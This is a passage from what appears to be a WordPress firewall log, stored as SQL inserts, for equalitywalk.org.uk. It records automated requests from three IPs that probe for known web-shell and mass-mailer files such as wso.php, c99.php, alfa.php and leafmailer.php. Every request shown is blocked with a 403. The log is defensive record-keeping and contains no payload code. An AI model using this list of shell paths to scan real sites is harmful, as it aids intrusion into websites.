Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','5LrEg9DhTXlbwQYkG4axMIHZ',0,1674059020.6747,137,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','4N1VzewE9Z3g7qOQDox5nkXF',0,1674059021.7347,211,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','8ud0peFBHkMTsSLC6m2nfx9i',0,1674059022.9045,109,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','7VX5eUoFdsmiyz49RKIpLWgG',0,1674059023.9435,142,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','w83g4MYil6k2LXnEVUKIbhuz',0,1674059025.0058,151,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','QGIBEvubaFlTryHP5dL68AtO',0,1674059026.0814,249,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','KlYueFySaBnMcRvg8zCDL5EA',0,1674059027.2638,139,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','UCAgnjKv5WRD6GkpoTucmbay',0,1674059028.3762,227,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','dNaMFzcEB5XLRCIi071fKZq4',0,1674059029.5322,248,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','gx9rPdyRIpT7wzA2kSbHDKF6',0,1674059030.7060,224,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','of1xeVbK7P4hYGBDLN0wW5qR',0,1674059031.8643,152,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','HDFxbQWiamSZJ94prNvOgkVA',0,1674059032.9438,157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','UBpmqSDGzCJ5E8OLWeiZdH71',0,1674059034.0332,276,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','rMi7OQsxCjNab04T1XWqHU5D',0,1674059035.2279,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','dHVPAGYW29pI7Da5gUNi3Mxl',0,1674059036.3871,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','du2qzoxQCaAWKLt0FJfibO5Y',0,1674059037.4247,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','E9pQw6jrDJygbtXeKYas1GM2',0,1674059038.4540,152,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','tD8f9H1lEubj3zXi0nkOgcC2',0,1674059039.5197,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','WjU0OLGB6dTwuI12qRls4zPg',0,1674059040.5323,117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','xAHEWZbCeVO6K2rjmDYcfgPh',0,1674059041.5784,152,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','PflcDgUxHmQyk9zR8a2wVC1o',0,1674059042.6593,157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','6o2jg4lhCWB0Fek3NH8tGyLA',0,1674059043.7598,257,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','oM3qpKNenBwfQJ7EuvyGTijk',0,1674059044.9862,191,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','CSVIplw2N4Wg0dQDLiKXHZ6s',0,1674059046.1182,229,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','gVFXotq7R915pijuH6D0JEdB',0,1674059047.2817,195,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','vnGf0C1Z3iMAVLtTdjD7R8z4',0,1674059048.4189,153,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ueaQSGUjYDrzfRZwW42IM35T',0,1674059049.5174,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','9w4UYtvVQANSdkBsTCl0PGoy',0,1674059050.6237,237,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','SGEFHI6kis8tDxN3ZolCfQRW',0,1674059051.7960,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','LIUfaq6cWOpslun4H9zCZDK5',0,1674059052.8488,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','3Qzy2bS5wf9mLpuKJIn6AogU',0,1674059053.9543,114,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/LEAF.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','vWLNlkDcs254VfdJaQotEPh9',0,1674059054.9854,156,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','hdSlXUkfv9wMpeuDKCHjVYa3',0,1674059056.0512,153,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','57LAwkaZ4SU8zQTRmq1N2fJ9',0,1674059057.1482,148,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','dISHAEGk8walRY0hWfBJ9pP6',0,1674059058.2186,132,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','U9GEcHwiosSnxCZFmThvrOeQ',0,1674059059.2934,136,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','bxPChoOjpzUsB9yREcfYSdZi',0,1674059060.3574,145,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','cHN6pslWqO1brEvGBKCMfUdu',0,1674059061.4188,243,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','FRrxyZgKtCh08fPOb6iHGjkw',0,1674059062.6013,117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','oc32vp8PUIhmD0usFeST9AKR',0,1674059063.6530,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','9VNU0wCQXuGzyv3nILp1OHts',0,1674059064.6881,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','1z6ChUg8yYQMv9xlroLH4PAG',0,1674059065.7401,211,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ZcmI97FwhNPxBA2TCY4UgD06',0,1674059066.8825,209,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','rngCvW1582bsLmFkTtOVYp7M',0,1674059068.0328,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ZCnk1w7bxvG5TrLMRscogWuK',0,1674059069.0820,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XOE3yNZ0tkflUCs5HLAnpq2M',0,1674059070.2006,304,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XmzLYsltGdc1Vg8WF2OQZ5bn',0,1674059071.4354,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','vcSRYyDJXHb04P8teF25sMxV',0,1674059072.5373,144,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','E1Ffopt20YZugcOSKwINjCTl',0,1674059073.6259,126,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','94wyaEq5Ps6Z7r1HvWNXxkOu',0,1674059074.6708,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','soiP53eLDtngyEprHbMkc2lC',0,1674059075.7574,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','qRUhAv3TLltpQW45BKoDewPH',0,1674059076.8378,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','sfkYFHqQPIhGRA2jdg1bnu4K',0,1674059077.9412,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','eblNLmpyDx4RMV0G8khKHYU5',0,1674059079.0276,120,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','1BMH78lOXtJkIZSL0gw5bRdP',0,1674060619.5322,113,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','GvVOmlM28HCoD4NSbzKLQJEp',0,1674060623.0091,224,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','oWaOIfksDJ0QKq9CwTiZgdUp',0,1674060637.7033,112,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','cxQpXkHbMfyLunq65PtTzgUv',0,1674060639.4125,157,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','NMTGwWhA1aS60fIgE9spCPdx',0,1674060644.5363,127,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','sJrH2Eh7xCiojwc0fKS3gt9m',0,1674060651.2561,111,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','jrR1cLPOubVf9JYZMAKaQ2It',0,1674060655.2893,140,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','otvAcxyQa87OIpsWEjUhTg3J',0,1674060662.4354,115,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','C28IlRHzNtPFW4oEg1bqS56D',0,1674060664.1910,132,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','liq8g17v65nEawTGAfFJmByH',0,1674060667.2079,217,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','ygReurUPCwa1S5ztbHxXqiQA',0,1674060671.4154,149,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','Zu6HRJV3Ma8cobiSvPLg2NnC',0,1674060677.1278,129,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','0NxSD5ekuEnqRMCsIVWpflAa',0,1674060679.3259,105,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','knuo8Bsh5X9xJwOlPm7S2Wtr',0,1674060683.0790,116,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','LiBnXmlZObJu2DzsItdpN789',0,1674063062.0905,116,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-admin/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','IzlKMWbaXDmprL6q3H8yJdcP',0,1674063062.4585,103,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/s_e.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','OAuYXraJk7C6WPdZBHjMhtxf',0,1674063067.5868,116,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/s_ne.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','17vAJQsxSLyuBXr45nbcaKG0',0,1674063068.5297,168,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','N5se37iD2oKjTakVrB4h90Wp',0,1674063069.8517,122,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','jGmf1vP2xnEwZTO5IeHoyrC7',0,1674063071.2721,117,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','7FlBKS63mAk4Q0gbRMXu5Gqf',0,1674063072.0890,126,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/radio.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ztPL8K5Fbnfo4glARHdvcMJ7',0,1674063085.0277,132,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/lock360.php?daksldlkdsadas=1','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','4fJtsvn6WzTAcO17pCKkqNyL',0,1674063101.8292,145,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-load.php?daksldlkdsadas=1','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','YKd2cX6I8ExT9u51OtZs0SNg',0,1674063110.7177,128,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/old-index.php?daksldlkdsadas=1','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','rtVLQF1EzuYIv9Ag5saO0JyT',0,1674063112.1995,109,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','l4vYI7rwFQDWpKigVknCEGmz',0,1674063120.6731,111,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/xmlrpcs.php?daksldlkdsadas=1','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','b7sUlptmzOBPevY5a1wxJITq',0,1674063132.6566,104,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-admin.php?daksldlkdsadas=1','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','EWV7ubrTSC0zDoaqwtQcdshG',0,1674063134.5017,113,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/qindex.php?daksldlkdsadas=1','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','de6mO3fi8QnyWZ0pHAbocKkP',0,1674063142.5721,163,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/doc.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','QZJ4z8XKgBsqUSRxFtpmjYN6',0,1674063144.1758,127,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','qVotwSuTnrvHEiP9x7lz03LZ',0,1674063145.4836,127,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','lmc2pyfk45wCFIPZaqoKB1YD',0,1674063148.4338,112,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/ups.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Jf1DS6rmEsFynVYgedOzk7GK',0,1674063156.2883,163,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-signin.php?dizo&ping','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','cumbrwvFxNKosCdUyLDSeTP0',0,1674063159.2440,124,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/media-admin.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','l95ztMA3CUHqTRvjSPpygLeK',0,1674063160.4348,110,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 